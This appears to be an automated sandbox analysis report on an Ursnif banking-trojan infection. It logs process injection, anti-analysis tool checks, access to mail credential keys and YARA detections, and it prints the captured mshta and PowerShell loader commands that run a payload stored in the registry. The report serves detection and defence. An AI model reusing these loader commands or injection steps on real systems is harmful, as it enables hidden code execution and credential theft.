Source: mshta.exe, 00000011.00000003.746769025.00000164FEABF000.00000004.00000001.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Q
Source: explorer.exe, 0000001E.00000000.836872400.000000000FD75000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: explorer.exe, 0000001E.00000000.817397904.0000000004710000.00000004.00000001.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
Source: wscript.exe, 00000000.00000002.684689037.000001CE12A80000.00000002.00000001.sdmp, explorer.exe, 0000001E.00000002.929529321.00000000058C0000.00000002.00000001.sdmp, RuntimeBroker.exe, 0000001F.00000002.917618198.0000027D4F440000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000020.00000002.916418234.000001B4FA9B0000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 0000001E.00000000.826085147.000000000A716000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
Source: RuntimeBroker.exe, 0000001F.00000000.812442013.0000027D4E762000.00000004.00000001.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&1EC51BF7&0&000000
Source: wscript.exe, 00000000.00000002.684689037.000001CE12A80000.00000002.00000001.sdmp, explorer.exe, 0000001E.00000002.929529321.00000000058C0000.00000002.00000001.sdmp, RuntimeBroker.exe, 0000001F.00000002.917618198.0000027D4F440000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000020.00000002.916418234.000001B4FA9B0000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 0000001E.00000000.826085147.000000000A716000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
Source: wscript.exe, 00000000.00000002.684689037.000001CE12A80000.00000002.00000001.sdmp, explorer.exe, 0000001E.00000002.929529321.00000000058C0000.00000002.00000001.sdmp, RuntimeBroker.exe, 0000001F.00000002.917618198.0000027D4F440000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000020.00000002.916418234.000001B4FA9B0000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Benign windows process drops PE files

Show sources

Source: C:\Windows\System32\wscript.exe

File created: marginal.roq.0.dr

Jump to dropped file

Allocates memory in foreign processes

Show sources

Source: C:\Windows\System32\control.exe	Memory allocated: C:\Windows\explorer.exe base: 3100000 protect: page execute and read and write
Source: C:\Windows\System32\control.exe	Memory allocated: C:\Windows\System32\rundll32.exe base: 27FF7160000 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 27D4F3D0000 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1B4F85E0000 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1DA4C300000 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 23FE2C70000 protect: page execute and read and write

Changes memory attributes in foreign processes to executable or writable

Show sources

Source: C:\Windows\System32\control.exe	Memory protected: C:\Windows\explorer.exe base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\System32\control.exe	Memory protected: C:\Windows\explorer.exe base: 7FFABD4F1580 protect: page execute read
Source: C:\Windows\System32\control.exe	Memory protected: C:\Windows\explorer.exe base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFABD4F1580 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write

Compiles code for process injection (via .Net compiler)

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File written: C:\Users\user\AppData\Local\Temp\ztp4fhzn\ztp4fhzn.0.cs

Jump to dropped file

Creates a thread in another existing process (thread injection)

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread created: C:\Windows\explorer.exe EIP: BD4F1580	Jump to behavior
Source: C:\Windows\System32\control.exe	Thread created: C:\Windows\explorer.exe EIP: BD4F1580
Source: C:\Windows\explorer.exe	Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: BD4F1580
Source: C:\Windows\explorer.exe	Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: BD4F1580
Source: C:\Windows\explorer.exe	Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: BD4F1580
Source: C:\Windows\explorer.exe	Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: BD4F1580
Source: C:\Windows\explorer.exe	Thread created: unknown EIP: BD4F1580

Injects code into the Windows Explorer (explorer.exe)

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3424 base: 9EA000 value: 00	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3424 base: 7FFABD4F1580 value: EB	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3424 base: 24C0000 value: 80	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3424 base: 7FFABD4F1580 value: 40	Jump to behavior
Source: C:\Windows\System32\control.exe	Memory written: PID: 3424 base: 9E8000 value: 00
Source: C:\Windows\System32\control.exe	Memory written: PID: 3424 base: 7FFABD4F1580 value: EB
Source: C:\Windows\System32\control.exe	Memory written: PID: 3424 base: 3100000 value: 80
Source: C:\Windows\System32\control.exe	Memory written: PID: 3424 base: 7FFABD4F1580 value: 40

Maps a DLL or memory area into another process

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\System32\control.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\System32\control.exe	Section loaded: unknown target: C:\Windows\System32\rundll32.exe protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: unknown protection: execute and read and write

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread register set: target process: 3424	Jump to behavior
Source: C:\Windows\System32\control.exe	Thread register set: target process: 3424
Source: C:\Windows\System32\control.exe	Thread register set: target process: unknown
Source: C:\Windows\explorer.exe	Thread register set: target process: 3656
Source: C:\Windows\explorer.exe	Thread register set: target process: 4268
Source: C:\Windows\explorer.exe	Thread register set: target process: 4772
Source: C:\Windows\explorer.exe	Thread register set: target process: 4660
Source: C:\Windows\explorer.exe	Thread register set: target process: 6188

Writes to foreign memory regions

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 9EA000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 7FFABD4F1580	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 24C0000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 7FFABD4F1580	Jump to behavior
Source: C:\Windows\System32\control.exe	Memory written: C:\Windows\explorer.exe base: 9E8000
Source: C:\Windows\System32\control.exe	Memory written: C:\Windows\explorer.exe base: 7FFABD4F1580
Source: C:\Windows\System32\control.exe	Memory written: C:\Windows\explorer.exe base: 3100000
Source: C:\Windows\System32\control.exe	Memory written: C:\Windows\explorer.exe base: 7FFABD4F1580
Source: C:\Windows\System32\control.exe	Memory written: C:\Windows\System32\rundll32.exe base: 7FF7E3A85FD0
Source: C:\Windows\System32\control.exe	Memory written: C:\Windows\System32\rundll32.exe base: 27FF7160000
Source: C:\Windows\System32\control.exe	Memory written: C:\Windows\System32\rundll32.exe base: 7FF7E3A85FD0
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 8C7CFF1000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 27D4F3D0000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 738687B000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1B4F85E0000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1BD2177000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1DA4C300000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 9B6E3C8000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 23FE2C70000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580

Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\5b2bnkld\5b2bnkld.cmdline'	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ztp4fhzn\ztp4fhzn.cmdline'	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES269.tmp' 'c:\Users\user\AppData\Local\Temp\5b2bnkld\CSC18B8FCEB9D646308CD119582578A238.TMP'	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES16AC.tmp' 'c:\Users\user\AppData\Local\Temp\ztp4fhzn\CSC901590E0DE33494E82C695FA40AE49BE.TMP'
Source: C:\Windows\System32\control.exe	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com

Source: unknown

Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'

Source: explorer.exe, 0000001E.00000002.911824864.0000000000AD8000.00000004.00000020.sdmp	Binary or memory string: ProgmanMD6
Source: explorer.exe, 0000001E.00000000.806990764.0000000001080000.00000002.00000001.sdmp, RuntimeBroker.exe, 0000001F.00000000.811588677.0000027D4CC60000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000020.00000000.819186048.000001B4F8C60000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000022.00000000.827225493.000001DA4A460000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 0000001E.00000000.806990764.0000000001080000.00000002.00000001.sdmp, RuntimeBroker.exe, 0000001F.00000000.811588677.0000027D4CC60000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000020.00000000.819186048.000001B4F8C60000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000022.00000000.827225493.000001DA4A460000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000001E.00000000.806990764.0000000001080000.00000002.00000001.sdmp, RuntimeBroker.exe, 0000001F.00000000.811588677.0000027D4CC60000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000020.00000000.819186048.000001B4F8C60000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000022.00000000.827225493.000001DA4A460000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: explorer.exe, 0000001E.00000000.806990764.0000000001080000.00000002.00000001.sdmp, RuntimeBroker.exe, 0000001F.00000000.811588677.0000027D4CC60000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000020.00000000.819186048.000001B4F8C60000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000022.00000000.827225493.000001DA4A460000.00000002.00000001.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 0000001E.00000000.826085147.000000000A716000.00000004.00000001.sdmp	Binary or memory string: Shell_TrayWnd5D

Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Bonaparte.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Bonaparte.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Bonaparte.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Bonaparte.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Bonaparte.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Bonaparte.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Bonaparte.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Bonaparte.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Bonaparte.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Bonaparte.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior

Source: C:\Windows\System32\control.exe

Code function: 25_2_00B9C164 CreateMutexExA,GetUserNameA,

25_2_00B9C164

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmp	Binary or memory string: procmon.exe
Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmp	Binary or memory string: tcpview.exe
Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmp	Binary or memory string: wireshark.exe
Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmp	Binary or memory string: avz.exe
Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmp	Binary or memory string: cports.exe
Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmp	Binary or memory string: lordpe.exe
Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmp	Binary or memory string: icesword.exe
Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmp	Binary or memory string: ollydbg.exe
Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmp	Binary or memory string: regshot.exe

Stealing of Sensitive Information:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 0000001E.00000003.808606221.0000000002B40000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.713745606.0000000004E38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.847373383.0000027FF74FE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.919536378.0000027D4F83E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000000.822942973.000000000688E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.920076099.0000023FE357E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.784762432.0000000005000000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.713671055.0000000004E38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.726412237.0000000004CBB000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.713608519.0000000004E38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.846903592.0000000000BAE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.813116966.00000000051F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000003.795282435.0000022982C20000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.799740968.000001EFF5FD0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000003.846098745.0000027FF7200000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.713720104.0000000004E38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.713577898.0000000004E38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.713547031.0000000004E38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.713695029.0000000004E38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.713644884.0000000004E38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.916792918.000001DA4C27E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.917824420.000001B4FAD4E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 6828, type: MEMORY
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 3656, type: MEMORY
Source: Yara match	File source: Process Memory Space: control.exe PID: 6328, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 4604, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 3424, type: MEMORY

Tries to steal Mail credentials (via file access)

Show sources

Source: C:\Windows\explorer.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
Source: C:\Windows\explorer.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Remote Access Functionality:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 0000001E.00000003.808606221.0000000002B40000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.713745606.0000000004E38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.847373383.0000027FF74FE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.919536378.0000027D4F83E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000000.822942973.000000000688E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.920076099.0000023FE357E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.784762432.0000000005000000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.713671055.0000000004E38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.726412237.0000000004CBB000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.713608519.0000000004E38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.846903592.0000000000BAE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.813116966.00000000051F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000003.795282435.0000022982C20000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.799740968.000001EFF5FD0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000003.846098745.0000027FF7200000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.713720104.0000000004E38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.713577898.0000000004E38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.713547031.0000000004E38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.713695029.0000000004E38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.713644884.0000000004E38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.916792918.000001DA4C27E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.917824420.000001B4FAD4E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 6828, type: MEMORY
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 3656, type: MEMORY
Source: Yara match	File source: Process Memory Space: control.exe PID: 6328, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 4604, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 3424, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation221	Path Interception	Process Injection812	Scripting121	Credential API Hooking3	Account Discovery1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Ingress Tool Transfer3	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scripting121	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Obfuscated Files or Information2	LSASS Memory	File and Directory Discovery2	Remote Desktop Protocol	Email Collection11	Exfiltration Over Bluetooth	Encrypted Channel1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Exploitation for Client Execution1	Logon Script (Windows)	Logon Script (Windows)	File Deletion1	Security Account Manager	System Information Discovery126	SMB/Windows Admin Shares	Credential API Hooking3	Automated Exfiltration	Non-Application Layer Protocol4	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	Command and Scripting Interpreter1	Logon Script (Mac)	Logon Script (Mac)	Rootkit4	NTDS	Query Registry1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol4	SIM Card Swap		Carrier Billing Fraud
